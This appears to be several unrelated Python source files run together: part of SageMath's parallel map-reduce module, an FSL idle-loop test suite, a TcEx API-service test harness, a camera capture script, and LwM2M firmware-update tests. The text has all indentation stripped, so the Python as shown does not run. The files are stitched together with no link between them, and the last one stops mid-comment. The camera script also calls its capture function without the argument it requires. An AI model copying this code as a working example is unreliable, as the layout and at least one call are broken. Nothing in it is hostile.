sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
logger.debug("Started")
mapred = self._mapred
reduce_init = mapred.reduce_init
results = mapred._results
self._stats[0] = 0
self._stats[3] = 0
logger.debug("Launching thief")
self._thief = Thread(target = self._thief, name="Thief")
self._thief.start()
self._res = reduce_init()
try:
while True:
try:
node = self._todo.pop()
except IndexError:
node = self.steal()
self.walk_branch_locally(node)
if not self._reduce_locally:
self.send_partial_result()
except AbortError:
logger.debug("Worker Done !")
results.put(self._res)
results.put(None)
self._thief.join()
del self._request
self._read_task.close()
self._write_task.close()
del self._read_task, self._write_task
del self._mapred
del self._stats
logger.debug("Exiting")
def send_partial_result(self):
r"""
Send results to the MapReduce process.
Send the result stored in ``self._res`` to the master an reinitialize it to
``master.reduce_init``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._res = 4
sage: w.send_partial_result()
sage: w._res
0
sage: EX._results.get()
4
"""
self._mapred._results.put(self._res)
self._res = self._mapred.reduce_init()
def walk_branch_locally(self, node):
r"""
Work locally.
Performs the map/reduce computation on the subtrees rooted at ``node``.
INPUT:
- ``node`` -- the root of the subtree explored.
OUTPUT:
Nothing, the result are stored in ``self._res``.
This is where the actual work is performed.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: w = RESetMapReduceWorker(EX, 0, True)
sage: def sync(): pass
sage: w.synchronize = sync
sage: w._res = 0
sage: w.walk_branch_locally([])
sage: w._res
x^4 + x^3 + x^2 + x + 1
sage: w.walk_branch_locally(w._todo.pop())
sage: w._res
2*x^4 + x^3 + x^2 + x + 1
sage: while True: w.walk_branch_locally(w._todo.pop())
Traceback (most recent call last):
...
IndexError: pop from an empty deque
sage: w._res
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
mapred = self._mapred
children = mapred.children
post_process = mapred.post_process
fun = mapred.map_function
reduc = mapred.reduce_function
# logger.debug("Working on %s..." % (node,))
while True:
res = post_process(node)
if res is not None:
self._res = reduc(self._res, fun(res))
newnodes = iter(children(node))
try:
node = next(newnodes)
except StopIteration:
return
self._todo.extend(newnodes)
class RESetMPExample(RESetMapReduce):
r"""
An example of map reduce class.
INPUT:
- ``maxl`` -- the maximum size of permutations generated (default to `9`).
This computes the generating series of permutations counted by their size
up to size ``maxl``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: EX.run()
362880*x^9 + 40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5
+ 24*x^4 + 6*x^3 + 2*x^2 + x + 1
.. SEEALSO:: This is an example of :class:`RESetMapReduce`
"""
def __init__(self, maxl = 9):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample()
<sage.parallel.map_reduce.RESetMPExample object at 0x...>
"""
RESetMapReduce.__init__(self)
from sage.rings.polynomial.polynomial_ring import polygen
from sage.rings.integer_ring import ZZ
self.x = polygen(ZZ, 'x')
self.maxl = maxl
def roots(self):
r"""
Return the empty permutation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().roots()
[[]]
"""
return [[]]
def children(self, l):
r"""
Return the children of the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
The lists with ``len(l)`` inserted at all possible positions into ``l``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().children([1,0])
[[2, 1, 0], [1, 2, 0], [1, 0, 2]]
"""
return [ l[:i] + [len(l)] + l[i:]
for i in range(len(l)+1) ] if len(l) < self.maxl else []
def map_function(self, l):
r"""
The monomial associated to the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
The monomial ``x^len(l)``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().map_function([1,0])
x^2
"""
return self.x**len(l)
class RESetParallelIterator(RESetMapReduce):
r"""
A parallel iterator for recursively enumerated sets.
This demonstrates how to use :class:`RESetMapReduce` to get an iterator on
a recursively enumerated set for which the computations are done in
parallel.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator([[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: sum(1 for _ in S)
65535
"""
def map_function(self, z):
r"""
Return a singleton tuple.
INPUT:
- ``z`` -- a node
OUTPUT:
The singleton ``(z, )``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: S.map_function([1, 0])
([1, 0],)
"""
return (z,)
reduce_init = tuple
def __iter__(self):
r"""
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: it = iter(S)
sage: next(it) # random
[1, 1, 0]
sage: next(it) # random
[1, 1, 0, 1]
sage: sum(1 for _ in it)
65533
"""
self.setup_workers(reduce_locally=False)
self.start_workers()
active_proc = self._nprocess
while True:
newres = self._results.get()
if newres is not None:
logger.debug("Got some results")
for r in newres:
yield r
else:
active_proc -= 1
if active_proc == 0:
break
self.finish()
|
test_idle.py | #!/usr/bin/env python
#
# test_idle.py -
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
import gc
import time
import threading
import random
import importlib
import pytest
from unittest import mock
import fsl.utils.idle as idle
from fsl.utils.platform import platform as fslplatform
def _run_with_wx(func, *args, **kwargs):
gc.collect()
propagateRaise = kwargs.pop('propagateRaise', True)
startingDelay = kwargs.pop('startingDelay', 500)
finishingDelay = kwargs.pop('finishingDelay', 500)
callAfterApp = kwargs.pop('callAfterApp', None)
import wx
result = [None]
raised = [None]
app = [wx.App()]
frame = wx.Frame(None)
if callAfterApp is not None:
callAfterApp()
# canHaveGui caches its return val,
# so clear it otherwise we may
# affect subsequent tests
idle._canHaveGui.cache_clear()
def wrap():
try:
if func is not None:
result[0] = func(*args, **kwargs)
except Exception as e:
print(e)
raised[0] = e
finally:
def finish():
frame.Destroy()
app[0].ExitMainLoop()
wx.CallLater(finishingDelay, finish)
frame.Show()
wx.CallLater(startingDelay, wrap)
app[0].MainLoop()
time.sleep(1)
idle.idleLoop.reset()
idle._canHaveGui.cache_clear()
if raised[0] and propagateRaise:
raise raised[0]
del app[0]
return result[0]
def _run_without_wx(func, *args, **kwargs):
with mock.patch.dict('sys.modules', wx=None):
return func(*args, **kwargs)
def _wait_for_idle_loop_to_clear():
if fslplatform.haveGui:
import wx
idleDone = [False]
def busywait():
idleDone[0] = True
idle.idle(busywait)
while not idleDone[0]:
wx.GetApp().Yield()
@pytest.mark.wxtest
def test_run_with_gui(): _run_with_wx( _test_run)
def test_run_without_gui(): _run_without_wx(_test_run)
def _test_run():
taskRun = [False]
onFinishCalled = [False]
onErrorCalled = [False]
def task():
taskRun[0] = True
def errtask():
taskRun[0] = True
raise Exception('Task which was supposed to crash crashed!')
def onFinish():
onFinishCalled[0] = True
def onError(e):
onErrorCalled[0] = True
t = idle.run(task)
if t is not None:
t.join()
assert taskRun[0]
taskRun[0] = False
t = idle.run(task, onFinish, onError)
if t is not None:
t.join()
_wait_for_idle_loop_to_clear()
taskRun[ 0] = False
onFinishCalled[0] = False
t = idle.run(errtask, onFinish, onError)
if t is not None:
t.join()
_wait_for_idle_loop_to_clear()
assert taskRun[ 0]
assert not onFinishCalled[0]
assert onErrorCalled[ 0]
@pytest.mark.wxtest
def test_callRate_with_gui(): _run_with_wx( _test_callRate)
def test_callRate_without_gui(): _run_without_wx(_test_callRate)
def _test_callRate():
idle.idleLoop.reset()
default = idle.idleLoop.callRate
idle.idleLoop.callRate = 999
assert idle.idleLoop.callRate == 999
idle.idleLoop.callRate = None
assert idle.idleLoop.callRate == default
@pytest.mark.wxtest
def test_block_with_gui(): _run_with_wx( _test_block)
def test_block_without_gui(): _run_without_wx(_test_block)
def _test_block():
called = [False]
if fslplatform.haveGui:
import wx
def idlefunc():
called[0] = True
wx.CallLater(1000, idlefunc)
start = time.time()
idle.block(2)
end = time.time()
# Be relaxed about precision - timing
# can sometimes be pretty sloppy when
# running in a docker container.
assert abs((end - start) - 2) < 0.05
if fslplatform.haveGui:
assert called[0]
@pytest.mark.wxtest
def test_block_until_with_gui(): _run_with_wx( _test_block_until)
def test_block_until_without_gui(): _run_without_wx(_test_block_until)
def _test_block_until():
ev = threading.Event()
def task():
time.sleep(1)
ev.set()
threading.Thread(target=task).start()
start = time.time()
idle.block(3, until=ev.is_set)
end = time.time()
assert end - start < 3
@pytest.mark.wxtest
def test_idle():
called = [False]
def task(arg, kwarg1=None):
called[0] = arg == 1 and kwarg1 == 2
def errtask(arg, kwarg1=None):
raise Exception('Task which was supposed to crash crashed!')
assert idle.idleLoop.callRate > 0
# Run directly
_run_without_wx(idle.idle, task, 1, kwarg1=2, name='direct')
assert called[0]
called[0] = False
# Run on wx idle loop
_run_with_wx(idle.idle, task, 1, kwarg1=2)
assert called[0]
# Run a crashing task directly
with pytest.raises(Exception):
idle.idle(errtask, 1, kwarg1=2)
# Run a crashing task on idle loop - error should not propagate
_run_with_wx(idle.idle, errtask, 1, kwarg1=2)
@pytest.mark.wxtest
def test_inidle():
called = [False]
name = 'mytask'
def task():
called[0] = True
def queuetask():
idle.idle(task, after=0.01, name=name)
assert idle.idleLoop.inIdle(name)
_run_with_wx(queuetask)
assert called[0]
@pytest.mark.wxtest
def test_cancelidle():
called = [False]
name = 'mytask'
def task():
called[0] = True
def queuetask():
idle.idle(task, after=0.01, name=name)
idle.idleLoop.cancelIdle(name)
_run_with_wx(queuetask)
assert not called[0]
@pytest.mark.wxtest
def test_idle_skipIfQueued():
task1called = [False]
task2called = [False]
name = 'mytask'
def task1():
task1called[0] = True
def task2():
task2called[0] = True
def queuetask():
idle.idle(task1, after=0.01, name=name)
idle.idle(task2, after=0.01, name=name, skipIfQueued=True)
_run_with_wx(queuetask)
assert task1called[0]
assert not task2called[0]
@pytest.mark.wxtest
def test_idle_dropIfQueued():
task1called = [False]
task2called = [False]
name = 'mytask'
def task1():
print('task1 called')
task1called[0] = True
def task2():
print('task2 called')
task2called[0] = True
def queuetask():
print('Queuetask running')
idle.idle(task1, after=0.01, name=name)
idle.idle(task2, after=0.01, name=name, dropIfQueued=True)
print('Queuetask finished')
import sys
print('running with wx')
sys.stdout.flush()
_run_with_wx(queuetask)
print('run with wx finished')
sys.stdout.flush()
assert not task1called[0]
assert task2called[0]
@pytest.mark.wxtest
def test_idle_alwaysQueue1():
# Test scheduling the task before
# a wx.App has been created.
called = [False]
def task():
called[0] = True
# In this scenario, an additional call
# to idle (after the App has been created)
# is necessary, otherwise the originally
# queued task will not be called.
def nop():
pass
# The task should be run
# when the mainloop starts
idle.idle(task, alwaysQueue=True)
# Second call to idle.idle
_run_with_wx(idle.idle, nop)
assert called[0]
@pytest.mark.wxtest
def test_idle_alwaysQueue2():
# Test scheduling the task
# after a wx.App has been craeted,
# but before MainLoop has started
called = [False]
def task():
called[0] = True
def queue():
idle.idle(task, alwaysQueue=True)
_run_with_wx(None, callAfterApp=queue)
assert called[0]
@pytest.mark.wxtest
def test_idle_alwaysQueue3():
# Test scheduling the task
# after a wx.App has been craeted
# and the MainLoop has started.
# In this case, alwaysQueue should
# have no effect - the task should
# just be queued and executed as
# normal.
called = [False]
def task():
called[0] = True
_run_with_wx(idle.idle, task, alwaysQueue=True)
assert called[0]
@pytest.mark.wxtest
def test_idle_alwaysQueue4():
# Test scheduling the task when
# wx is not present - the task
# should just be executed immediately
called = [False]
def task():
called[0] = True
import fsl.utils.platform
with mock.patch.dict('sys.modules', {'wx' : None}):
# The idle._canHaveGui caches its result,
# so we need to invalidate it
idle._canHaveGui.cache_clear()
idle.idle(task, alwaysQueue=True)
with pytest.raises(ImportError):
import wx
importlib.reload(fsl.utils.platform)
assert called[0]
@pytest.mark.wxtest
def test_neverQueue(): _run_with_wx(_test_neverQueue)
def _test_neverQueue():
called = [False]
def task():
called[0] = True
oldval = idle.idleLoop.neverQueue
try:
idle.idleLoop.neverQueue = True
idle.idle(task)
assert called[0]
idle.idleLoop.neverQueue = False
called[0] = False
idle.idle(task)
assert not called[0]
_wait_for_idle_loop_to_clear()
assert called[0]
finally:
idle.idleLoop.neverQueue = oldval
@pytest.mark.wxtest
def test_synchronous(): _run_with_wx(_test_synchronous)
def _test_synchronous():
called = [False]
def task():
called[0] = True
def test_async():
called[0] = False
idle.idle(task)
assert not called[0]
_wait_for_idle_loop_to_clear()
assert called[0]
oldval = idle.idleLoop.neverQueue
try:
idle.idleLoop.neverQueue = False
test_async()
with idle.idleLoop.synchronous():
called[0] = False
idle.idle(task)
assert called[0]
test_async()
finally:
idle.idleLoop.neverQueue = oldval
@pytest.mark.wxtest
def test_idle_timeout():
called = [False]
def task():
called[0] = True
_run_with_wx(idle.idle, task, timeout=0.0000000000000001)
assert not called[0]
@pytest.mark.wxtest
def test_idleWhen():
called = [False]
timesPolled = [0]
def condition():
timesPolled[0] += 1
return timesPolled[0] == 50
def task():
called[0] = True
idle.idleLoop.callRate = 1
_run_with_wx(idle.idleWhen, task, condition, pollTime=0.001)
assert called[0]
assert timesPolled[0] == 50
@pytest.mark.wxtest
def test_wait_with_gui(): _run_with_wx(_test_wait, finishingDelay=1100)
def test_wait_without_gui(): _test_wait()
def _test_wait():
ntasks = 10
def threadtask(num):
time.sleep(random.random())
threadtaskscalled[num] = True
def waittask():
waittaskcalled[0] = True
for wait_direct in [False, True]:
threadtaskscalled = [False] * ntasks
waittaskcalled = [False]
threads = [threading.Thread(target=threadtask, args=(n,))
for n in range(ntasks)]
for t in threads:
t.start()
t = idle.wait(threads, waittask, wait_direct=wait_direct)
if t is not None:
t.join()
_wait_for_idle_loop_to_clear()
assert all(threadtaskscalled)
assert waittaskcalled[0]
def test_TaskThread():
called = [False]
def task():
called[0] = True
tt = idle.TaskThread()
tt.start()
tt.enqueue(task)
time.sleep(0.5)
tt.stop()
tt.join()
assert called[0]
def test_TaskThread_onFinish():
taskCalled = [False]
onFinishCalled = [False]
def task():
taskCalled[0] = True
def onFinish():
onFinishCalled[0] = True
tt = idle.TaskThread()
tt.start()
tt.enqueue(task, onFinish=onFinish)
time.sleep(0.5)
tt.stop()
tt.join()
assert taskCalled[0]
assert onFinishCalled[0]
def test_TaskThread_onError():
taskCalled = [False]
onFinishCalled = [False]
onErrorCalled = [False]
def task():
taskCalled[0] = True
raise Exception('Task error')
def onFinish():
onFinishCalled[0] = True
def onError(e):
onErrorCalled[0] = str(e)
tt = idle.TaskThread()
tt.start()
tt.enqueue(task, onFinish=onFinish, onError=onError)
time.sleep(0.5)
tt.stop()
tt.join()
assert taskCalled[0]
assert onErrorCalled[0] == 'Task error'
assert not onFinishCalled[0]
def test_TaskThread_isQueued():
called = [False]
def busyTask():
time.sleep(0.5)
def realTask():
called[0] = True
tt = idle.TaskThread()
tt.start()
tt.enqueue(busyTask)
tt.enqueue(realTask, taskName='realTask')
time.sleep(0.25)
queued = tt.isQueued('realTask')
time.sleep(0.3)
tt.stop()
tt.join()
assert queued
assert called[0]
def test_TaskThread_dequeue():
called = [False]
def busyTask():
time.sleep(0.5)
def realTask():
called[0] = True
tt = idle.TaskThread()
tt.start()
tt.enqueue(busyTask)
tt.enqueue(realTask, taskName='realTask')
time.sleep(0.25)
tt.dequeue('realTask')
time.sleep(0.3)
tt.stop()
tt.join()
assert not called[0]
def test_TaskThread_TaskVeto():
taskCalled = [False]
onFinishCalled = [False]
def task():
taskCalled[0] = True
raise idle.TaskThreadVeto()
def onFinish():
onFinishCalled[0] = True
tt = idle.TaskThread()
tt.start()
tt.enqueue(task, onFinish=onFinish)
time.sleep(0.5)
tt.stop()
tt.join()
assert taskCalled[0]
assert not onFinishCalled[0]
def test_mutex():
class Thing(object):
@idle.mutex
def method1(self):
self.method1start = time.time()
time.sleep(0.01)
self.method1end = time.time()
@idle.mutex
def method2(self):
self.method2start = time.time()
time.sleep(0.01)
self.method2end = time.time()
for i in range(200):
t = [Thing()]
def thread1():
t[0].method1()
def thread2():
t[0].method2()
for i in range(10):
t[0].method1start = None
t[0].method2start = None
t[0].method1end = None
t[0].method2end = None
t1 = threading.Thread(target=thread1)
t2 = threading.Thread(target=thread2)
t1.start()
t2.start()
t1.join()
t2.join()
# Either t1 has to start and
# finish before t2 or vice versa
assert (t[0].method2start >= t[0].method1end or
t[0].method1start >= t[0].method2end)
|
test_case_api_service.py | """TcEx Service Common Module"""
# standard library
import http.server
import json
import os
import socketserver
import sys
import time
from threading import Event, Thread
from typing import Optional
from urllib.parse import parse_qs, urlparse
from uuid import uuid4
# third-party
from requests.auth import HTTPBasicAuth
# first-party
from tcex.sessions import ExternalSession
from .test_case_service_common import TestCaseServiceCommon
class ApiServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
"""HTTP Server for testing API Services"""
allow_reuse_address = True
def __init__(self, test_case: object, bind_addr: tuple):
"""Initialize Class properties
Args:
test_case: The test_case object.
bind_addr: The binding address w/ port.
"""
super().__init__(bind_addr, RequestHandler)
self.test_case = test_case
# properties
self._host = bind_addr[0]
self._port = bind_addr[1]
self.active_requests = {}
self.active_responses = {}
self.args = test_case.default_args
self.log = test_case.log
self.message_broker = test_case.message_broker
self.mqtt_client = test_case.message_broker.client
# start server thread
service = Thread(group=None, target=self.run, name='SimpleServerThread', daemon=True)
service.start()
def listen(self):
"""List for message coming from broker."""
self.message_broker.add_on_connect_callback(self.on_connect)
self.message_broker.add_on_message_callback(
callback=self.on_message, topics=[self.test_case.client_topic]
)
t = Thread(name='broker-listener', target=self.message_broker.connect, args=(), daemon=True)
t.start()
def on_connect(self, client, userdata, flags, rc): # pylint: disable=unused-argument
"""Handle message broker on_connect events."""
# subscribe to client topic
client.subscribe(self.test_case.client_topic)
def on_message(self, client, userdata, message): # pylint: disable=unused-argument
"""Handle message broker on_message events."""
try:
m = json.loads(message.payload)
except ValueError:
raise RuntimeError(f'Could not parse API service response JSON. ({message})')
# only process RunService Acknowledged commands.
if m.get('command').lower() == 'acknowledged' and m.get('type').lower() == 'runservice':
self.active_responses[m.get('requestKey')] = m
self.active_requests.pop(m.get('requestKey')).set()
def run(self):
"""Run the server in threat."""
print(f'\nRunning server: http://{self._host}:{self._port}')
self.serve_forever()
class RequestHandler(http.server.BaseHTTPRequestHandler):
"""Request handler to forward request to API service."""
def _build_request(self, method: str) -> dict:
"""Return request built from incoming HTTP request.
{
"apiToken": "SVC:5:RgIo6v:1596670377509:95:vWO1zu8W0a2NyXctWORKMe/kA616P6Vk8dsYvG ... ",
"appId": 95,
"bodyVariable": "request.body",
"command": "RunService",
"expireSeconds": 1596670377,
"headers": [
{
"name": "Accept",
"value": "*/*"
},
{
"name": "User-Agent",
"value": "PostmanRuntime/7.26.2"
},
{
"name": "Content-Type",
"value": "application/json"
}
],
"method": "GET",
"path": "/data",
"queryParams": [
{
"name": "max",
"value": "1000"
}
],
"requestKey": "c29927c8-b94d-4116-a397-e6eb7002f41c"
}
Args:
method: The HTTP method.
Returns:
dict: The response to send to API service over message broker topic.
"""
url_parts = urlparse(self.path)
# query params
params = []
for name, value in parse_qs(url_parts.query).items():
if isinstance(value, list):
for v in value:
params.append({'name': name, 'value': v})
else:
params.append({'name': name, 'value': value})
# forward request to service
request_key = str(uuid4())
content_length = int(self.headers.get('content-length', 0))
if content_length:
body = self.rfile.read(content_length)
self.server.test_case.redis_client.hset(request_key, 'request.body', body)
request_url = self.headers.get('Host', 'http://localhost:8042')
if request_url and not request_url.startswith(('http://', 'https://')):
request_url = f'https://{request_url}'
return {
'apiToken': self.server.test_case.tc_token,
'appId': 95,
'bodyVariable': 'request.body',
'command': 'RunService',
'expireSeconds': int(time.time() + 600),
'headers': [{'name': name, 'value': value} for name, value in self.headers.items()],
'method': method,
'path': url_parts.path,
'queryParams': params,
'requestKey': request_key,
'requestUrl': request_url,
'remoteAddress': '127.0.0.1',
}
def _build_response(self, response: Optional[dict] = None) -> None:
"""Build response data from API service response.
{
"bodyVariable": "response.body",
"command": "Acknowledged",
"headers": [
{
"name": "x-cache",
"value": "MISS"
},
{
"name": "retry-after",
"value": "20"
},
{
"name": "content-type",
"value": "application/json"
},
],
"requestKey": "97190c5a-05e7-493d-8cb5-33844190eb72",
"status": "Too Many Requests",
"statusCode": "429",
"type": "RunService"
}
Args:
response: The response data from API service.
"""
if response is None:
self.send_error(500, message='No response sent on message broker client channel.')
return
# status code
self.send_response(int(response.get('statusCode')))
# headers
for header in response.get('headers'):
self.send_header(header.get('name'), str(header.get('value')))
self.end_headers()
# body
body = self.server.test_case.redis_client.hget(response.get('requestKey'), 'response.body')
if body is not None:
self.wfile.write(body)
def call_service(self, method: str): # pylint: disable=useless-return
"""Call the API Service
Args:
method: The HTTP method.
"""
request = self._build_request(method)
request_key = request.get('requestKey')
# create lock and sve request
event = Event()
self.server.active_requests[request_key] = event
# publish run service
self.server.test_case.publish(
message=json.dumps(request), topic=self.server.test_case.server_topic
)
# block for x seconds
event.wait(60)
response: dict = self.server.active_responses.pop(request_key, None)
self._build_response(response=response)
return
def do_DELETE(self):
"""Handle DELETE method."""
return self.call_service('DELETE')
def do_GET(self):
"""Handle GET method."""
return self.call_service('GET')
def do_PATCH(self):
"""Handle PATCH method."""
return self.call_service('PATCH')
def do_POST(self):
"""Handle POST method."""
return self.call_service('POST')
class TestCaseApiService(TestCaseServiceCommon):
"""Service App TestCase Class"""
_test_client = None
api_server = None
api_service_host = os.getenv('API_SERVICE_HOST')
api_service_path = ''
api_service_path_base = '/api/services'
api_service_port = os.getenv('API_SERVICE_PORT')
api_service_protocol = 'https://'
api_service_type = None
stop_server = False
def on_message(self, client, userdata, message): # pylint: disable=unused-argument
"""Handle message broker on_message shutdown command events."""
try:
m = json.loads(message.payload)
except ValueError:
raise RuntimeError(f'Could not parse API service response JSON. ({message})')
# only process RunService Acknowledged commands.
if message.topic == self.server_topic and m.get('command').lower() == 'shutdown':
self.stop_server = True
def run(self):
"""Run the Playbook App.
Returns:
int: The App exit code
"""
if not self.utils.to_bool(os.getenv('API_SERVICE_RUN', 'false')):
return None
# first-party
from run import run # pylint: disable=no-name-in-module
# backup sys.argv
sys_argv_orig = sys.argv
# clear sys.argv
sys.argv = sys.argv[:1]
# run the app
exit_code = 0
try:
# provide callback to to run.py method on Trigger Service Apps
run(set_app=self._app_callback) # pylint: disable=unexpected-keyword-arg
except SystemExit as e:
exit_code = e.code
# restore sys.argv
sys.argv = sys_argv_orig
self.log.data('run', 'Exit Code', exit_code)
return exit_code
def setup_method(self):
"""Run before each test method runs."""
if not self.utils.to_bool(os.getenv('API_SERVICE_RUN', 'false')):
super().setup_method()
return
self.api_service_host = 'localhost'
self.api_service_path = ''
self.api_service_path_base = ''
self.api_service_protocol = 'http://'
self.api_service_port = 8042
self.api_server = ApiServer(self, (self.api_service_host, self.api_service_port))
self.api_server.listen()
# subscribe to server topic
self.message_broker.client.subscribe(self.server_topic)
# register on_message shutdown monitor
self.message_broker.add_on_message_callback(
callback=self.on_message, index=0, topics=[self.server_topic]
)
super().setup_method()
def teardown_method(self):
"""Run after each test method runs."""
if not self.utils.to_bool(os.getenv('API_SERVICE_RUN', 'false')):
super().teardown_method()
return
self.api_server.server_close()
super().teardown_method()
@property
def test_client(self):
"""Return test client."""
if not self._test_client:
if not self.api_service_host:
self.tcex.exit(1, 'Required env variable: API_SERVICE_HOST not set.')
base_url = f'{self.api_service_protocol}{self.api_service_host}'
if self.api_service_port:
base_url += f':{int(self.api_service_port)}'
base_url += f'{self.api_service_path_base}{self.api_service_path}'
self._test_client = self.tcex.session
if self.api_service_type.lower() == 'external':
self._test_client = ExternalSession(base_url)
else:
self._test_client.base_url = base_url
return self._test_client
def set_test_client_auth(self, username: str, password: str) -> None:
"""Set basic auth on test_client.
Args:
username: The basic auth username.
password: The basic auth password.
"""
self.test_client.auth = HTTPBasicAuth(username, password)
|
pyspintest.py | from simple_pyspin import Camera
import time
from PIL import Image
import os
from multiprocessing import Process
def image_capture(duration):
num_frames = int(duration * 50)
with Camera() as cam:
# If this is a color camera, request the data in RGB format.
if 'Bayer' in cam.PixelFormat:
cam.PixelFormat = "RGB8"
# Get images from the full sensor
cam.OffsetX = 0
cam.OffsetY = 0
cam.Width = cam.SensorWidth
cam.Height = cam.SensorHeight
# set framerate
# cam.AcquisitionFrameRate = 60
print('Opened camera: %s (#%s)' % (cam.DeviceModelName, cam.DeviceSerialNumber))
print('Recording...')
# Start recording
cam.start()
start = time.time()
print(start)
# Get 100 images as numpy arrays
imgs = [cam.get_array() for n in range(num_frames)]
# Stop recording
el = time.time() - start
print('el is', el)
cam.stop()
print('Acquired %d images in %.2f s (~ %.1f fps)' % (len(imgs), el, len(imgs) / el))
# Make a directory to save some images
output_dir = 'test_images'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('Saving to "%s"' % output_dir)
# Save them
for n, img in enumerate(imgs):
Image.fromarray(img).save(os.path.join(output_dir, '%08d.jpg' % n))
return start
p1 = Process(target=image_capture)
p1.start()
p1.join()
|
firmware_update.py | # -*- coding: utf-8 -*-
#
# Copyright 2017-2021 AVSystem <avsystem@avsystem.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import http
import os
import resource
import socket
import threading
import time
from framework.lwm2m_test import *
from .utils import DataModel, ValueValidator as VV
class FirmwareUpdate:
class Test(DataModel.Test):
def collect_values(self, path: Lwm2mPath, final_value, max_iterations=100, step_time=0.1):
observed_values = []
orig_timeout = self.serv.get_timeout()
try:
deadline = time.time() + max_iterations * step_time
while True:
timeout = max(deadline - time.time(), 0.0)
self.serv.set_timeout(timeout)
try:
state = self.test_read(path)
except socket.timeout:
break
observed_values.append(state)
if state == final_value:
break
time.sleep(step_time)
return observed_values
finally:
self.serv.set_timeout(orig_timeout)
def setUp(self, extra_cmdline_args=[]):
self.ANJAY_MARKER_FILE = generate_temp_filename(dir='/tmp', prefix='anjay-fw-updated-')
super().setUp(fw_updated_marker_path=self.ANJAY_MARKER_FILE, extra_cmdline_args=extra_cmdline_args)
def tearDown(self):
# reset the state machine
# Write /5/0/1 (Firmware URI)
req = Lwm2mWrite(ResPath.FirmwareUpdate.PackageURI, '')
self.serv.send(req)
self.assertMsgEqual(Lwm2mChanged.matching(req)(), self.serv.recv())
super().tearDown()
class TestWithCoapServer(Test):
def setUp(self, coap_server=None, extra_cmdline_args=[]):
super().setUp(extra_cmdline_args=extra_cmdline_args)
from framework.coap_file_server import CoapFileServerThread
self.server_thread = CoapFileServerThread(coap_server=coap_server)
self.server_thread.start()
@property
def file_server(self):
return self.server_thread.file_server
def tearDown(self):
try:
super().tearDown()
finally:
self.server_thread.join()
class FirmwareUpdateWithHttpServer:
class Test(FirmwareUpdate.Test):
FIRMWARE_PATH = '/firmware'
HTTP_SERVER_CLASS = http.server.HTTPServer
def get_firmware_uri(self):
return 'http://127.0.0.1:%d%s' % (self.http_server.server_address[1], self.FIRMWARE_PATH)
def before_download(self):
pass
def during_download(self, request_handler):
pass
def setUp(self, firmware_package):
super().setUp()
test_case = self
class FirmwareRequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
test_case.requests.append(self.path)
test_case.before_download()
self.send_response(http.HTTPStatus.OK)
self.send_header('Content-type', 'application/octet-stream')
self.send_header('Content-length', len(firmware_package))
self.end_headers()
# give the test some time to read "Downloading" state
time.sleep(1)
test_case.during_download(self)
try:
self.wfile.write(firmware_package)
except BrokenPipeError:
pass
def log_request(code='-', size='-'):
# don't display logs on successful request
pass
self.requests = []
self.http_server = self.HTTP_SERVER_CLASS(('', 0), FirmwareRequestHandler)
self.server_thread = threading.Thread(target=lambda: self.http_server.serve_forever())
self.server_thread.start()
def tearDown(self):
try:
super().tearDown()
finally:
self.http_server.shutdown()
self.server_thread.join()
# there should be exactly one request
self.assertEqual([self.FIRMWARE_PATH], self.requests)
class Test751_FirmwareUpdate_QueryingTheReadableResources(FirmwareUpdate.Test):
def runTest(self):
# 1. READ (CoAP GET) operation is performed on the Firmware Update
# Object Instance
#
# A. In test step 1, the Server receives the status code "2.05" for
# READ operation success
# B. In test step 1, the returned values regarding State (ID:3) and
# Update Result (ID:5) prove the Client FW update Capability is in
# initial state (State=Idle & Update Result= Initial Value).
# C. In test step 1, the returned values regarding Firmware Update
# Protocol Support (ID:8) & Firmware Update Delivery Method
# (ID:9) allow to determine the supported characteristics of the
# Client FW Update Capability.
self.test_read('/%d/0' % OID.FirmwareUpdate,
VV.tlv_instance(
resource_validators={
RID.FirmwareUpdate.State: VV.from_raw_int(0),
RID.FirmwareUpdate.UpdateResult: VV.from_raw_int(0),
RID.FirmwareUpdate.FirmwareUpdateProtocolSupport: VV.multiple_resource(VV.from_values(b'\x00', b'\x01', b'\x02', b'\x03', b'\x04', b'\x05')),
RID.FirmwareUpdate.FirmwareUpdateDeliveryMethod: VV.from_raw_int(2),
},
ignore_extra=True))
class Test755_FirmwareUpdate_SettingTheWritableResourcePackage(FirmwareUpdate.Test):
def runTest(self):
# 1. A WRITE (CoAP PUT) operation with a NULL value ('\0') is
